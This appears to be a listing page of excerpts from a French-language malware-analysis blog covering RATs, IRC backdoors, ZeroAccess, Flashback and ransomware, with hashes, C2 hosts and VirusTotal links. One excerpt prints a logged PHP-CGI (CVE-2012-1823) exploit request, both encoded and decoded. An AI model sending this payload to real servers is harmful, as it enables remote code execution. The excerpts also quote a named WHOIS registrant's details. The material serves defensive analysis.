Hier et quelques jours auparavant, des sujets similaires pour une campagne du RAT (Remote Access Tool) NanoCore NanoCore est donc un malware de type Backdoor qui permet le contrôle à distance de l’ordinateur et faire à peu près tout : contrôler la souris, effectuer des captures d’écran, activer la Webcam et […]

Found some IRCBots thoses last days, well detected (arond 27 on VirusTotal). https://www.virustotal.com/fr/file/ba66dde2ea247acc8dd85fb6e5bea5929db70f7288e26ff4afcfa69b4426fa00/analysis/ https://www.virustotal.com/fr/file/c72c0c6ca9657edee9e730027eafc6c9a041b0ddc68820983e00d5c3389dde9a/analysis/ https://www.virustotal.com/fr/file/80ffe2bbe9e6185f42c4144246b21b7af953d025f21d65a5d10607cbb594bb8b/analysis/ Theses IRCBackdoor connect to irc.overthetopseo.com (167.114.77.30 – OVH CA) Notice the « Guy » name in the domain registration informations : Registrant Name: Guy Shitrit Registrant Organization: Guy Shitrit Registrant Street: Henriyeta Sold Registrant City: Qiryat Bialik […]

Je regardais les logs modsec de quelques serveurs, celui-ci a attiré mon attention : Une machine OVH 91.121.87.116 qui tente une attaque PHP-CGI (CVE-2012-1823 ), le script complet est disponible là : http://pjjoint.malekal.com/files.php?read=20140331_g13q9u5i11j6 Ce dernier test les connexions SSH, le script a pour but de dropper un shell sur la machine victime. Un […]

Voici un petit billet concernant une infection trouvée sur des serveurs que j’administre depuis peu. Tout commence par une alerte par mail de Munin fraîchement mis en place. Munin est un grapher rddtools qui envoie des alertes lorsque des seuils sont dépassés, en l’occurrence ici, c’était la CPU. Ce qui est […]

Il y a quelques jours, j’ai eu un sujet virus gendarmerie où la personne clamait avoir choppé cela après un téléchargement depuis un site WEB : https://forum.malekal.com/virus-interpol-agence-nationale-secu-t45704.html#p359076 Lors de la visite sur le site web, on se trouve avec une message « Flash Player required for this website, click Download NOW » – […]

Aujourd’hui, la seconde attaque venant d’une IP OVH a attiré mon attention : https://www.malekal.com/modsec/index.php?ip=37.187.77.137   L’exploit se situe là : POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 Décodé on obtient : cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions= » » -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n C’est un exploit qui tire […]

Trouvés par S!Ri, il ya quelques jours : http://botnets-urz.blogspot.co.uk/2013/01/srv5050co-ngrbot.html http://botnets-urz.blogspot.co.uk/2013/01/46166177124.html Une Backdoor IRC (Je ne pense pas que ce soit un nrgbot / Dorkbot) qui sévit sur Skype. Mais plutôt une Backdoor IRC qui ressemble assez à celle qui sévissiant sur MSN en 2006/2007 : https://forum.malekal.com/vers-virus-msn-et-arnaques-sur-msn.html Le lien envoyé se trouve […]

Une page concernant le Malware Backdoor.Proxybox. Ce malware transforme le PC en proxy, le faisant joindre un botnet, qui permet ensuite d’être vendu dans le milieu underground. J’ai rencontré deux fois ce dernier dans des packs via l’exploit Kit Redkit avec notamment le scareware Live Security Platinum, ZeroAccess/Sirefef et quelques […]

Je survolais la maillinglist d’OVH – quand le message suivant m’a interpelé : suivi du message suivant :   Ceci m’a fait penser au topic suivant : https://forum.malekal.com/sites-web-hackes-via-iframe-vpn-sniffage-t38819.html Du coup j’ai loadé l’infection, ce qui nous donne : TCP_MISS/302 431 GET http://luditla.ru/count20.php – DIRECT/50.88.174.84 – TCP_MISS/200 12715 GET http://79.96.76.203/99960006.html – […]

Un billet en mode revue de presse concernant l’infection Flashback qui a fait couler pas mal d’encre ces dernières semaines. Le malware a vu le jour courant septembre 2011, ce dernier se présentait sous forme de mise à jour Flash ou de pluggin Flash (Potentiellement sous forme de faux Codec. […]

Suite à l’édition du sujet sur ZeroAcess version 32bits où l’infection voit un retour d’un module qui repatch un driver système dans le cas où celui est nettoyé, rendant TDSSKiller inefficace (tant que le module n’est pas détecté). Je voulais voir ce que donnait les ZeroAccess Remover proposait par les […]

J’en avais déjà parlé sur un post de fin de 2010 : https://www.malekal.com/2010/12/07/slenfbot-still-an-other-irc-bot/ Cet IRC Backdoor de 2007/2008 est encore actif puisque croisé tout récemment sur un post de Commentcamarche.   Ci-dessous un exemple de lien malicieux envoyé par Skype : Comme expliqué dans le billet initial, le malware va se […]

Vu sur le site de tracking : La détection : http://www.virustotal.com/file-scan/report.html?id=2c25ce96d0ff48e04f78feba934e1827fd1ef390119958b010042ec73ca5bddd-1324409285 File name: bda4825f2cdd1ce0690ee0ba3d081266 Submission date: 2011-12-20 19:28:05 (UTC) Current status: finished Result: 3 /43 (7.0%) AhnLab-V3 2011.12.19.03 2011.12.19 Spyware/Win32.Zbot Fortinet 4.3.388.0 2011.12.20 W32/CRYPT.SMO!tr Microsoft 1.7903 2011.12.20 Backdoor:Win32/Gspy.A MD5 : bda4825f2cdd1ce0690ee0ba3d081266 SHA1 : 460c1d178dada1d447aa85960cc10a03941c88e8 SHA256: 2c25ce96d0ff48e04f78feba934e1827fd1ef390119958b010042ec73ca5bddd Le malware se charge par […]

Hier j’ai pas mal bourriné sur le site de tracking en soumissions de malwares présents sur des BlackHole Deux malwares au noms inconnus ont attiré mon attention : Ransom.Win32.Birele et Backdoor.Win32.Papras Ransom.Win32.Birele Se lance par une simple Clef Run – Ce dernier crypte les documents et réclame 50 $ pour débloquer […]